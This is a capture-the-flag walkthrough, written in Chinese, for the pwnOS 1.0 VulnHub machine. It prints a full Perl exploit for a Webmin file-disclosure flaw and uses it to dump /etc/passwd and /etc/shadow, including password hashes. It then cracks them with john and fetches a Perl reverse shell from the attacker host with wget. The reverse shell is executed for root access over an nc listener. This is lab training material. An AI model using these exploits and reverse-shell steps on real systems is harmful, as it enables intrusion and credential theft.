PWNOS: 1.0
https://www.vulnhub.com/entry/pwnos-10,33/
扫描主机
# yunki @ yunki in ~ [11:04:09]
$ nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:04 CST
Nmap scan report for 192.168.54.2
Host is up (0.00052s latency).
Nmap scan report for 192.168.54.4
Host is up (0.00068s latency).
nmap 扫描
# yunki @ yunki in ~ [11:08:38]
$ sudo nmap --min-rate 10000 -p- 192.168.54.4
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:08 CST
Nmap scan report for 192.168.54.4
Host is up (0.00056s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds
# yunki @ yunki in ~ [11:08:57]
$ sudo nmap -sT -sV -O -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:09 CST
Nmap scan report for 192.168.54.4
Host is up (0.00054s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.16 seconds
# yunki @ yunki in ~ [11:10:00]
$ sudo nmap -sU -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:10 CST
Nmap scan report for 192.168.54.4
Host is up (0.00057s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
139/udp closed netbios-ssn
445/udp closed microsoft-ds
10000/udp open ndmp
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
# yunki @ yunki in ~ [11:10:09]
$ sudo nmap --script=vuln -p22,80,139,445,10000 192.168.54.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-14 11:10 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.4
Host is up (0.00028s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-enum:
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
| /index/: Potentially interesting folder
|_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
10000/tcp open snet-sensor-mgmt
| http-vuln-cve2006-3392:
| VULNERABLE:
| Webmin File Disclosure
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2006-3392
| Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
| This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
| to bypass the removal of "../" directory traversal sequences.
|
| Disclosure date: 2006-06-29
| References:
| http://www.exploit-db.com/exploits/1997/
| http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 345.88 seconds
web目录爆破
# yunki @ yunki in ~ [11:51:16]
$ dirb http://192.168.54.4/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 14 11:51:19 2023
URL_BASE: http://192.168.54.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.4/ ----
+ http://192.168.54.4/cgi-bin/ (CODE:403|SIZE:306)
+ http://192.168.54.4/index (CODE:200|SIZE:295)
+ http://192.168.54.4/index.php (CODE:200|SIZE:295)
+ http://192.168.54.4/index1 (CODE:200|SIZE:1104)
+ http://192.168.54.4/index2 (CODE:200|SIZE:156)
==> DIRECTORY: http://192.168.54.4/php/
+ http://192.168.54.4/server-status (CODE:403|SIZE:311)
---- Entering directory: http://192.168.54.4/php/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Mar 14 11:51:24 2023
DOWNLOADED: 4612 - FOUND: 6
web渗透
看到url试试文件包含http://192.168.54.4/index1.php?help=../../../../../../../../../../../etc/passwd&connect=../../../../../../../../../../../etc/passwd
http://192.168.54.4/index2.php?name=&level=n00b&submit=Please+Help%21
http://192.168.54.4/index2.php?name=&level=sk1ll3d+n00b&submit=Please+Help%21
http://192.168.54.4/index2.php?name=&level=l33t+hax0r&submit=Please+Help%21
没啥信息了。
看看其他端口。
# yunki @ yunki in ~/vulnhub/pwnos1 [12:09:48] C:1
$ searchsploit webmin
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt
Webmin - Brute Force / Command Execution | multiple/remote/705.pl
webmin 0.91 - Directory Traversal | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation | linux/remote/21765.pl
Webmin 0.x - Code Input Validation | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI) | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) | linux/webapps/49318.rb
Webmin 1.x - HTML Email Command Execution | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub/pwnos1 [12:10:46]
$ searchsploit -m 2017
Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
URL: https://www.exploit-db.com/exploits/2017
Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
File Type: Perl script text executable
Copied to: /home/yunki/vulnhub/pwnos1/2017.pl
# yunki @ yunki in ~/vulnhub/pwnos1 [12:11:47]
$ cat 2017.pl
#!/usr/bin/perl
# Exploit for WEBMIN and USERMIN less than 1.29x
# ARBITARY REMOTE FILE DISCLOSURE
# WORKS FOR HTTP AND HTTPS (NOW)
# Thrusday 13th July 2006
# Vulnerability Disclosure at securitydot.net
# Coded by UmZ! umz32.dll _at_ gmail.com
#
#
#
# Make sure you have LWP before using this exploit.
# USE IT AT YOUR OWN RISK
#
# GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
# for other.. like AHMED n FAIZ ... (GET A LIFE MAN).
# Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;
if (@ARGV < 4) {
print("Usage: $0 <url> <port> <filename> <target> \n");
print("TARGETS are\n ");
print("0 - > HTTP \n");
print(" 1 - > HTTPS\n");
print("Define full path with file name \n");
print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
exit(1);
}
($target, $port,$filename, $tar) = @ARGV;
print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
print("Attacking $target on port $port!\n");
print("FILENAME: $filename\n");
$temp="/..%01" x 40;
if ($tar == '0')
{ my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
$content=get $url;
print("\n FILE CONTENT STARTED");
print("\n -----------------------------------\n");
print("$content");
print("\n -------------------------------------\n");
}
elsif ($tar == '1')
{
my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
my $req = HTTP::Request->new(GET => $url);
my $res = $userag->request($req);
if ($res->is_success) {
print("FILE CONTENT STARTED\n");
print("-------------------------------------------\n");
print $res->as_string;
print("-------------------------------------------\n");
}
else {
print "Failed: ", $res->status_line, "\n";
}
}
# milw0rm.com [2006-07-15]%
# yunki @ yunki in ~/vulnhub/pwnos1 [13:42:14] C:1
$ sudo perl 2017.pl 192.168.54.4 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
-------------------------------------
# yunki @ yunki in ~/vulnhub/pwnos1 [12:15:26]
$ sudo perl 2017.pl 192.168.54.4 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
将上面两个内容写到文件里,分别是passwd,shadow文件里。(请注意,这里可以获取到shadow文件,说明该文件可以使用root权限,执行pl文件)
# yunki @ yunki in ~/vulnhub/pwnos1 [13:53:05]
$ unshadow passwd shadow > hash.txt
# yunki @ yunki in ~/vulnhub/pwnos1 [13:53:16]
$ cat hash.txt
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:!:100:101::/nonexistent:/bin/false
syslog:!:101:102::/home/syslog:/bin/false
klog:!:102:103::/home/klog:/bin/false
mysql:!:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:!:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:1001:1001::/home/obama:/bin/bash
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:1002:1002::/home/osama:/bin/bash
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:1003:1003::/home/yomama:/bin/bash
john 破解shadow
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
...
john --show hash.txt
获取初始shell
使用vmmware:h4ckm3登录ssh
提权
由上面的pl文件可以知道2017.pl可以root权限运行,那先构造个perl反弹shell,发送到靶机上。
kali:
# yunki @ yunki in ~ [14:13:56] C:1
$ locate perl-reverse-shell
/usr/share/webshells/perl/perl-reverse-shell.pl
# yunki @ yunki in ~ [14:15:19] C:1
$ cp /usr/share/webshells/perl/perl-reverse-shell.pl vulnhub/pwnos1/shell.cgi
# yunki @ yunki in ~ [14:16:23]
$ cd vulnhub/pwnos1
# 修改ip和port
# yunki @ yunki in ~/vulnhub/pwnos1 [14:16:31]
$ vim shell.cgi
# yunki @ yunki in ~/vulnhub/pwnos1 [14:17:02]
$ php -S 0:80
靶机:
vmware@ubuntuvm:/tmp$ cd /tmp
vmware@ubuntuvm:/tmp$ wget http://192.168.54.128/shell.cgi
--01:03:07-- http://192.168.54.128/shell.cgi
=> `shell.cgi.1'
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,716 (3.6K)
100%[===========================================================================================================>] 3,716 --.--K/s
01:03:07 (526.58 MB/s) - `shell.cgi' saved [3716/3716]
vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
这里别忘了,给执行权限chmod +x shell.cgi
然后开启监听端口,通过2017.pl 执行该shell文件。
# yunki @ yunki in ~/vulnhub/pwnos1 [14:23:42]
$ sudo perl 2017.pl 192.168.54.4 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /tmp/shell.cgi
FILE CONTENT STARTED
-----------------------------------
Browser IP address appears to be: 192.168.54.128<p>
-------------------------------------
root权限
# yunki @ yunki in ~ [14:24:02] C:1
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.4] 50328
01:01:41 up 1:20, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
vmware pts/0 192.168.54.128 00:41 4.00s 0.10s 0.10s -bash
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# whoami
root